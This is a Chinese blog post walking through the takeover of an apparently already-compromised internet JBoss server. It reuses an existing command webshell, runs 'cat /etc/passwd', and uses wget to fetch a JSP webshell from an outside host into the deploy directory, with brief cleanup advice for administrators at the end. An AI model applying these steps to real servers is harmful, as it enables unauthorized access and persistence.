Jboss信息查看获取Webshell

于 2023-07-19 10:23:23 发布
阅读量445 收藏
点赞数
分类专栏: 安全技术研究 文章标签: Jboss 提权 攻防
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44023460/article/details/131802742
版权

关于Jboss的渗透有很多方法,本文提到的这个方法是在前人的基础上快速获取Webshell,该方法简单可行。对于linux的渗透国外黑客喜欢直接执行命令,而国人喜欢GUI,因此在获取简单的Webshell也即仅仅可以执行命令的Webshell情况下,如何获取真正可操作的Webshell也是一大难点,本文介绍的方法就是专门解决该办法。
1.测试Jboss网页
通过端口扫描获取80和8080端口开放的服务器,如图1所示,该服务器采用80端口作为Jboss的Web应用端口。测试Jboss网页的目地是为了查看Jboss服务器是否能正常运行,一些服务是否开启。
在这里插入图片描述

图1测试Jboss网页
2.查看Tomcat状态
很多人首先想到的就是通过JMX Console的deployment的addurl函数来部署war的JspWebshell,实际上只要存在漏洞的互联网服务器,还是有很多黑客进行入侵,特别是国外的黑客。通过查看Tomcat的所有状态来获取目前Jboss应用应用的运行情况,如图2所示,从该图中可以看到至少被两个人入侵过,且服务器还在运行该Webshell,“zecmd/zecmd.jsp”即为网站的Webshell。
在这里插入图片描述

图2查看Tomcat的状态
3.执行命令测试
输入Webshell的完整地址,打开该Webshell页面,如图3所示,在输入框中输入“cat /etc/passwd”查看Linux系统用户的密码,测试结果表明该Webshell的权限是root权限,也即服务器权限。
在这里插入图片描述

图3测试Webshell
4.下载JspWebshell的txt文件到本地
虽然获取Webshell,但该Webshell为cmd的Webshell操作起来非常不方便,因此需要上传并部署一个好用的Webshell。先在肉机服务器上上传一个txt的JspWebshell,然后使用wget http://www.somesite.com/Browser.txt将该文件下载到该Linux服务器上,然后使用“ls –al”查看文件是否下载成功,如图4所示,在该列表中显示Browser.txt已经成功下载到本地。
在这里插入图片描述

图4下载Webshell到linux服务器
5.寻找可运行路径
在Linux层次结构中,用户可以在被授权的任意目录下利用mkdir命令创建新目录,也可以利用cd命令从一个目录转换到另一个目录。然而,没有提示符来告知用户目前处于哪一个目录中。想要知道当前所处的目录,可以用pwd(Print Work Directory的简写pwd)命令,该命令显示整个路径名。在渗透过程中pwd命令使用非常频繁,在本例中使用“pwd”命令获取当前路径位置,如图5所示,显示路径为“/opt/jboss-4.0.5.GA/bin”。
在这里插入图片描述

图5获取当前执行命令的路径
6. 查看Jboss默认部署路径的文件和目录
通过“ls-al”来获取当前路径下的文件和目录名称,完整命令为“ls -al /opt/jboss-4.0.5.GA/”,通过在绝对路径中添加新的路径来获取Jboss部署的路径,“/opt/jboss-4.0.5.GA /server/default/deploy/”,如图6所示,显示的分为文件和目录,目录是以d开头的。
在这里插入图片描述

图6查看Jboss默认部署路径的文件和目录
7.查看管理后台部署文件
部署路径下的目录有两种一种是“filename.war”,另外一种是系统自带的,例如“management”目录就是管理默认目录,如图7所示,该目录已经被部署了好几个shell。
在这里插入图片描述

图7查看管理后台部署文件
8. 复制JspWebshell到指定目录
将下载的JspWebshell复制到该目录即可获取Webshell,执行命令 “cp Browser.txt /opt/jboss-4.0.5.GA/server/default/deploy/management/zmeu.war/2.jsp”,如图8所示,然后执行“ls –al /opt/jboss-4.0.5.GA/server/default/deploy/management/zmeu.war”命令查看文件是否复制成功,结果如图9所示,文件已经成功复制。
在这里插入图片描述

图8复制JspWebshell到指定目录
在这里插入图片描述

图9查看复制文件是否成功
9.成功获取Webshell
在地址栏输入“http://xxx.xxx.xxx.xxx:8080/zmeu/2.jsp”进行访问,如图10所示,成功获取JspWebshell,前面对Webshell是一个执行命令的WebShell,其功能相对简单,通过将功能复杂的Webshell上传上去才能执行更多的操作。
在这里插入图片描述

图10成功获取JspWebshell
10.管理维护
对于管理人员来说,可以通过查看Tomcat的状态来获取Web应用情况,如图11所示,从Tomcat Status中去看Application list即可,在该列表中可以看到至少被部署了6个Webshell,发现这些Webshell后,到Jboss部署文件夹,将相应的war和文件删除即可。
在这里插入图片描述

图11查看已经被部署的Web应用

我是simeon
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
linux 查看jboss版本,Linux下jboss6.1.0日志输出设置
weixin_28858247的博客
04-30 1280
最近一段时间发现项目用了JBoss之后日志变得非常大。都是好几百兆了。于是在网上查找一些文档自己整理了一下关于JBoss日志的输出设置,我们先看下面一段代码#运行和错误日志写到文件log4j.appender.RunningLog =org.apache.log4j.sift.MDCSiftingAppenderlog4j.appender.RunningLog.key=bundle.namelo...
jboss7.1 linux版本
01-25
linux 环境jboss 7.1 (注jdk不要用1.8 否则不能启动)
jboss相关命令
流云追风
03-28 7950
./standalone.sh -h   --查看帮助 ./standalone.sh -v   --查看版本 JBoss EAP 6.1.0.GA (AS 7.2.0.Final-redhat-8) ./add-user.sh  --增加用户 进入控制台: ./jboss-cli.sh --connect help help --co
辨别JBoss版本并针对性挖掘漏洞
Kevin's Blog
06-08 2048
文章目录一、服务器中查看版本二、如何辨别JBoss版本2.1 通过页面特征2.1.1 JBoss 4.x (4.0.5)特征2.1.2 JBoss 6.x (6.1.0)特征2.2 通过访问接口特征2.2.1 JBoss 4.x(4.0.5)接口特征2.2.2 JBoss 6.x(6.1.0)接口特征三、JBoss漏洞如何利用3.1 不同版本反序列化接口3.3 不同版本利用工具 目的: 有时候我们需要对外网的JBoss版本进行快速辨别,使用不同的攻击载荷探针进行漏洞探测确认,对当前JBoss版本辨别就
如何查看linux版本 以及其他查看版本的命令
热门推荐
snow365的专栏
04-29 1万+
如何查看linux版本
jboss-eap-7.2.6-patch
09-22
jboss-eap-7.2.6-patch,jboss补丁包
JavaEE源代码 jboss-common
07-09
JavaEE源代码 jboss-commonJavaEE源代码 jboss-commonJavaEE源代码 jboss-commonJavaEE源代码 jboss-commonJavaEE源代码 jboss-commonJavaEE源代码 jboss-commonJavaEE源代码 jboss-commonJavaEE源代码 jboss-...
jboss-4.0.5.GA.zip
10-25
jboss-4.0.5.GA.zip
JBoss-config.zip_jboss
09-24
JBoss配置,详细讲解了JBoss jxl_console及web_console配置信息
JBOSS版本(3~6)下载地址
12-20
JBOSS版本(3~6)下载地址、JBOSS版本(3~6)下载地址、JBOSS版本(3~6)下载地址、JBOSS版本(3~6)下载地址
远程命令执行与反序列化之——jboss中间件反序列化漏洞获取Webshell还原
温柔小薛的博客
04-13 619
jboss中间件反序列化漏洞获取Webshell还原 理论 可以在谷歌浏览器的wappalyzer插件中查看jboss相关信息 历史漏洞参考;https://www.seebug.org/appdir/JBoss https://www.jianshu.com/p/e34062e0a6f1 默认后台地址:http://localhost:8080/jmx-console (前面讲过可以在这里...
Jboss历史漏洞利用 - JMX Console 未授权访问漏洞
HAKUNAMATATATTA的博客
12-08 2075
JbosswebUI界面 http://ip:port/jmx-console 未授权访问(或默认密码 admin/admin ),可导致JBoss的部署管理的信息泄露,攻击者也可以直接上传木马获取 webshell
服务攻防之中间件JBoss(上)
技术超强的网络安全平台
12-06 145
系列文章专辑:渗透测试之地基篇简介渗透测试-地基篇该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。请注意:本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。名言:你对这行的兴趣,决定你在这行的成就!一、前言中间件是介于应用系统和系统软件之间的一类
JBoss和Tomcat版本、及Servlet、JSP规范版本对应一览
hills的专栏
11-07 5246
JBoss和Tomcat版本、及Servlet、JSP规范版本对应一览
修改jboss发布的webServer默认ip
记录并分享信息的载体
09-23 462
使用jboss发布WebServer接口生成wsdl文件中ip地址发现不是自己想要的地址,需要修改这个ip。
JBoss5.1.0部署多个实例
csdn122325735的专栏
10-27 1092
实际开发中,使用JBoss部署经常会遇到需要部署多个实例的情况,即便是在使用eclipse开发中,也会遇到,下面介绍两种部署多实例的方法。windows和Linux环境通用。JBoss默认的部署应用的路径是{JBoss_Home}\server\default\deploy\,下面可以部署war包或是ear包。
利用JBoss漏洞拿webshell方法
weixin_34085658的博客
10-18 221
JBoss是一个大型应用平台,普通用户很难接触到。越是难以接触到的东西越觉得高深,借用北京公交司机李素丽的一句话“用力只能干出称职,用心才能干出优秀”,在安全上也是如此,虽然JBoss平台很难掌握,但是只要找到Jboss的罩门,一样轻松渗透,本文就如何针对Jboss的一个漏洞来获取Webshell,由于是研究,因此仅仅点到为止。   一、信息收集与整理 1.使用漏洞特征进行搜索   在Jboss...
取得jboss版本信息
成长的日子
09-26 5357
由于写脚本的需要, 要获取jboss版本信息。   大家都知道,web server的版本信息一定会在启动的时候打印在日志里面, 所以,我们只要去日志里面找就可以了。   默认输出是server.log     cat server.log 后得到: =============================================================...
idea jboss
最新发布
12-05
为了在IntelliJ IDEA中使用JBoss,需要进行以下步骤: 1. 在IDEA中安装JBoss插件。打开IDEA,进入File -> Settings -> Plugins,搜索JBoss,安装插件并重启IDEA。 2. 在IDEA中配置JBoss服务器。进入File -> Settings -> Application Servers,点击“+”号添加JBoss服务器。在弹出的窗口中选择JBoss的安装目录,设置服务器名称和端口号等信息。 3. 在IDEA中创建JBoss项目。进入File -> New -> Project,选择Java Enterprise,选择JBoss服务器,设置项目名称和路径等信息。在创建项目时,可以选择使用EJB或者Servlet等技术。 4. 在IDEA中部署和运行JBoss项目。在创建项目后,可以直接在IDEA中部署和运行JBoss项目。在IDEA的右上角选择JBoss服务器,点击“Run”按钮即可启动项目。 5. 在IDEA中调试JBoss项目。在IDEA中可以方便地进行调试,可以设置断点、查看变量等信息。 下面是一个简单的示例代码,演示如何在IDEA中使用JBoss: ```java import javax.ejb.Stateless; @Stateless public class HelloWorldBean implements HelloWorld { public String sayHello() { return "Hello World!"; } } ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

我是simeon

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值